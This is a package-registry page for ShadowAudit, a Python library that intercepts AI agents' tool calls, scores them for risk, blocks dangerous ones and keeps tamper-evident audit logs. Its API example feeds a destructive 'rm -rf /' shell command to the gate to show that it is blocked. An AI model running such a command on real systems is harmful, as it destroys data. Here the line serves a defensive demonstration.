Skip to main content

Runtime governance for AI agents — deterministic fail-closed enforcement. Wraps any agent tool and blocks dangerous calls before execution. Zero LLM calls, zero cloud dependencies, works offline.

Project description

ShadowAudit

Runtime governance for AI agents — deterministic fail-closed enforcement with auditor-defensible cryptographic audit logs.

PyPI version Python versions License: MIT Tests: 226 passed


ShadowAudit sits between your agent and its tools. It evaluates every call before execution and blocks anything that exceeds your risk threshold. Three things differentiate it from horizontal governance toolkits like Microsoft AGT: (1) auditor-defensible cryptographic audit logs — every decision is hash-chained and optionally Ed25519-signed, producing evidence conformity assessors accept; (2) financial-vertical taxonomy depth — built-in Stripe, Plaid, and fintech-specific risk categories out of the box; (3) air-gap-first deployment — single pip install, zero external calls, works inside isolated VPCs and on-prem.

Agent → ShadowAudit Gate → Tool (allowed)
                         → Blocked (AgentActionBlocked raised)

Why ShadowAudit?

Problem ShadowAudit's Answer
Agents execute arbitrary shell commands Keyword + regex + AST risk scoring with configurable thresholds
No audit trail for agent decisions Hash-chained, tamper-evident SQLite audit log with SHA-256 linkage and optional Ed25519 signing
Can't prove compliance to auditors Professional HTML reports with SOX/PCI-DSS mappings + EU AI Act Annex IV evidence pack generator
Agent behavior drifts over time Adaptive scoring with behavioral state tracking (K/V metrics)
CI/CD deploys unsafe agents --fail-on-ungated flag blocks deployments
Legal team blocks cloud-dependent tools Works fully offline — zero external calls
EU AI Act Annex IV evidence required Built-in evidence pack generator (JSON + HTML)

vs Microsoft Agent Governance Toolkit (AGT)

"AGT is the right horizontal governance toolkit. ShadowAudit is the auditor-defensible, financial-vertical, air-gap-ready layer for regulated workloads. Run both — AGT for breadth, ShadowAudit for the audit evidence your conformity assessor will actually accept."

See docs/POSITIONING.md for a detailed, honest comparison.

Dimension Microsoft AGT ShadowAudit
License MIT MIT (OSS SDK)
Coverage All 10 OWASP Agentic risks 3–5 of 10, focused on tool-call execution
Vendor Microsoft Independent
Audit log Standard logging Hash-chained, Ed25519-signed, tamper-evident
Vertical taxonomies Generic Financial / fintech depth (Stripe, Plaid)
Air-gap deployment Possible but assembly required First-class — single pip install
EU AI Act evidence pack Compliance module exists Annex IV evidence-pack generator built-in
Solo-buyable for SMBs No Yes

Hosted dashboard and managed cloud tier in development — contact for early access.

Quick Start

pip install shadowaudit

CLI — 3 commands to get started

# 1. Scan your codebase for ungated AI agent tools
shadowaudit check ./src

# 2. Generate a risk assessment with compliance mappings
shadowaudit assess ./src --taxonomy financial --compliance

# 3. Verify your audit log hasn't been tampered with
shadowaudit verify audit.db

# 4. Analyse decisions and get threshold tuning suggestions
shadowaudit tune --audit-log audit.db

For the full CLI reference (all 8 commands with flags and examples), see docs/CLI.md.

Python API — wrap any tool in 5 lines

from shadowaudit import Gate

gate = Gate()
result = gate.evaluate(
    agent_id="agent-1",
    task_context="shell_tool",
    risk_category="execute",
    payload={"command": "rm -rf /"},
)
print(result.passed)        # False
print(result.risk_score)    # 0.11 (varies by payload)
print(result.reason)        # "drift_detected"

Framework adapters: LangChain (ShadowAuditTool), CrewAI (ShadowAuditCrewAITool), LangGraph (ShadowAuditToolNode), OpenAI Agents SDK (ShadowAuditOpenAITool), and MCP (MCPGatewayServer + ShadowAuditMCPSession). See examples/ for runnable scripts for each.

See examples/ for runnable scripts covering every framework adapter.

Features

Tamper-Evident Audit

Every gate decision is recorded in an append-only SQLite log. Entries are hash-chained via SHA-256 — modify any row and the chain breaks. Optional Ed25519 signing cryptographically proves authenticity. Verified with shadowaudit verify. See examples/tamper_demo.py for a live demonstration.

Observe Mode & Bypass

Roll out enforcement gradually with Gate(mode="observe"): decisions are logged but never blocked, and result.metadata["would_have_blocked"] tells you what enforce mode would have done. For human-approved overrides, use the bypass() context manager — every bypass is recorded in the audit log with a mandatory reason string.

# Shadow mode — log everything, block nothing
gate = Gate(mode="observe")
result = gate.evaluate(agent_id, task, category, payload)
print(result.metadata["would_have_blocked"])   # True if enforce would have blocked

# Bypass with immutable audit trail
with gate.bypass("agent-1", reason="approved by oncall #4521"):
    result = gate.evaluate("agent-1", task, category, payload)

Use shadowaudit tune --audit-log audit.db to analyse block rates per category and get threshold adjustment suggestions.

Multi-Agent Trust Propagation

FlowTracer tracks how data moves between agents and propagates trust downward. If Agent A processes untrusted web content, any payload that flows from A into Agent B's tool call is automatically tagged UNTRUSTED — regardless of B's own trust level.

from shadowaudit import FlowTracer, TrustLevel

tracer = FlowTracer()
tracer.record_output("web-scraper", scraped_data, trust=TrustLevel.UNTRUSTED)
tracer.record_flow("web-scraper", "summariser", parsed_data)

annotation = tracer.annotate(
    receiving_agent="payment-agent",
    source_agents=["summariser"],
    declared_trust=TrustLevel.SYSTEM,
)
print(annotation.effective_trust)   # TrustLevel.UNTRUSTED
print(annotation.contaminated_by)   # ['web-scraper']

Vertical Taxonomies

Built-in starter packs across 6 domains: general, financial (32 categories — Stripe, Plaid, wire transfers, KYC/AML), financial crypto (18 categories), healthcare (17 categories), legal, and open banking. Each taxonomy defines risk keywords, threshold deltas, severity levels, and compliance mappings. Build custom taxonomies interactively with shadowaudit build-taxonomy.

Framework Coverage

First-class adapters for LangChain, CrewAI, LangGraph, OpenAI Agents SDK, and MCP (gateway + in-process). Drop-in wrappers — same interface, automatic enforcement. Works with any tool that has name, description, and run().

Compliance Reporting

Generate professional HTML reports with executive summaries, risk breakdowns, and remediation plans. Built-in OWASP Agentic Top 10 coverage matrix (shadowaudit owasp) and EU AI Act Annex IV evidence pack generator (shadowaudit eu-ai-act) for regulatory submission. For an honest account of what ShadowAudit catches and misses, see docs/THREAT_MODEL.md.

Offline-First

No cloud. No LLM calls. No API keys. SQLite-backed state and audit log. Single pip install shadowaudit deploys everything needed for runtime governance inside air-gapped VPCs and on-prem environments.

CI/CD Integration

shadowaudit check --fail-on-ungated exits non-zero if high-risk tools are ungated. Drop into any pipeline to block unsafe deploys. Trace simulator replays agent execution logs through the gate for regression testing. A labelled corpus of 130 traces (50 benign / 50 risky / 30 edge cases) in tests/corpus/ lets you validate scoring changes before shipping.

Architecture

┌───────────────────────────────────────────────────────────┐
│                      ShadowAudit                           │
├───────────┬───────────┬───────────┬───────────┬───────────┤
│  CLI      │ LangChain │  CrewAI   │  Direct   │  MCP      │
│  (click)  │  Adapter  │  Adapter  │   Gate    │  Gateway  │
├───────────┴───────────┴───────────┴───────────┴───────────┤
│                    Core Gate Engine                        │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌────────────┐ │
│ │  Scorer   │ │  Taxonomy │ │    FSM    │ │  Audit Log │ │
│ │ pluggable │ │   Loader  │ │ fail-closed│ │Hash-chained│ │
│ └───────────┘ └───────────┘ └───────────┘ │  + Ed25519 │ │
│ ┌───────────┐ ┌───────────┐               └────────────┘ │
│ │   State   │ │   Hash    │                              │
│ │  (SQLite) │ │ (SHA-256) │                              │
│ └───────────┘ └───────────┘                              │
├───────────────────────────────────────────────────────────┤
│                  Assessment & Reporting                    │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌────────────┐ │
│ │  Scanner  │ │  Reporter │ │ Simulator │ │   Builder  │ │
│ │           │ │  (Jinja2) │ │           │ │            │ │
│ └───────────┘ └───────────┘ └───────────┘ └────────────┘ │
└───────────────────────────────────────────────────────────┘

How a tool call is evaluated

  1. Agent calls a tool → intercepted by the framework adapter or direct Gate.evaluate()
  2. Taxonomy lookup → finds risk category config (keywords, threshold delta, severity)
  3. Scoring → pluggable scorer computes risk score from payload content
  4. Threshold comparison → score vs. taxonomy delta determines pass/fail
  5. Mode / bypass check → observe mode always passes; active bypass() overrides a block
  6. FSM transition → fail-closed state machine: anything not an explicit pass is a block
  7. Audit log → decision recorded with timestamp, agent ID, payload hash, and reason

Installation

# Base install — CLI + core gate (click, jinja2)
pip install shadowaudit

# With LangChain adapter
pip install shadowaudit[langchain]

# With CrewAI adapter (Python 3.10–3.12)
pip install shadowaudit[crewai]

# Development
pip install shadowaudit[dev]

Requirements: Python 3.10+

Examples

See the examples/ directory for runnable scripts:

Example Description
local_only.py Direct Gate usage — no framework dependencies
langchain_agent.py LangChain agent with ShadowAudit-wrapped tools
hash_chain_demo.py Hash-chained audit log with tamper detection
tamper_demo.py Live tamper-evidence demo: corrupt a row, watch the chain break
fintech_payment_agent.py Production-style payment agent with Gate enforcement and retry logic
langgraph_demo.py LangGraph ShadowAuditToolNode integration
eu_ai_act_demo.py EU AI Act Annex IV evidence pack generation

Run all examples at once:

python examples/run_all_examples.py

For the full example index (14 scripts covering every v0.4.0 feature), see docs/FEATURES.md.

Testing

Quick smoke test after installing:

shadowaudit --version && \
shadowaudit check . && \
shadowaudit owasp && \
python -c "from shadowaudit.core.gate import Gate; print(Gate().evaluate({'tool':'read'}).passed)"

For the full testing guide, see docs/TESTING_GUIDE.md.

Project Status

ShadowAudit is v0.4.0 — production-ready for audit-time scanning and assessment workflows; runtime gating is in early-adopter use. APIs may evolve before v1.0.0; breaking changes require a major version bump and migration guide.

  • ✅ Core gate + 5 framework adapters (LangChain, CrewAI, LangGraph, OpenAI Agents, MCP)
  • ✅ Hash-chained, Ed25519-signed audit log with integrity verification
  • ✅ Observe mode, bypass context manager, and threshold tuning CLI
  • ✅ Multi-agent trust propagation via FlowTracer
  • ✅ Vertical taxonomies (general, financial 32-cat, financial_crypto, healthcare, legal, Plaid) + interactive builder
  • ✅ Labelled test corpus (130 traces) + scorer benchmark
  • ✅ Compliance reporting (OWASP matrix, EU AI Act Annex IV evidence packs)
  • ✅ Honest threat model — what ShadowAudit catches and what it doesn't (docs/THREAT_MODEL.md)
  • ✅ Offline-first — zero external calls, air-gap ready

Contributing

Bug reports and pull requests are welcome. See CONTRIBUTING.md for development setup, testing, and the PR process.

git clone https://github.com/AnshumanKumar14/shadowaudit-python.git
cd shadowaudit-python
pip install -e ".[dev,langchain]"
pytest tests/ -q

License

MIT — see LICENSE.


Built by Anshuman Kumar

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

shadowaudit-0.5.0.tar.gz (139.9 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

shadowaudit-0.5.0-py3-none-any.whl (99.8 kB view details)

Uploaded Python 3

File details

Details for the file shadowaudit-0.5.0.tar.gz.

File metadata

  • Download URL: shadowaudit-0.5.0.tar.gz
  • Upload date:
  • Size: 139.9 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.14.4

File hashes

Hashes for shadowaudit-0.5.0.tar.gz
Algorithm Hash digest
SHA256 52e311597e17005973f3dccbc52760a728a2a7fedea4786bac879db7f8031b06
MD5 141b5ee30f94f0293504e30b1d54e655
BLAKE2b-256 9951dbe68c9de171079156315e47886d9ea46e6d1a2dcc69a07e69facbc75288

See more details on using hashes here.

File details

Details for the file shadowaudit-0.5.0-py3-none-any.whl.

File metadata

  • Download URL: shadowaudit-0.5.0-py3-none-any.whl
  • Upload date:
  • Size: 99.8 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.14.4

File hashes

Hashes for shadowaudit-0.5.0-py3-none-any.whl
Algorithm Hash digest
SHA256 a4f0b1669dfc6235486fd1e3dd3f59b56ca297b263750809c5e3d1bcc539520f
MD5 375d3305a7b0d65fa7526221a7f5240b
BLAKE2b-256 b9d63b2f8af5873d56966de7d9b8e24abdf69e1f562df73e8333457c6cbb7a89

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page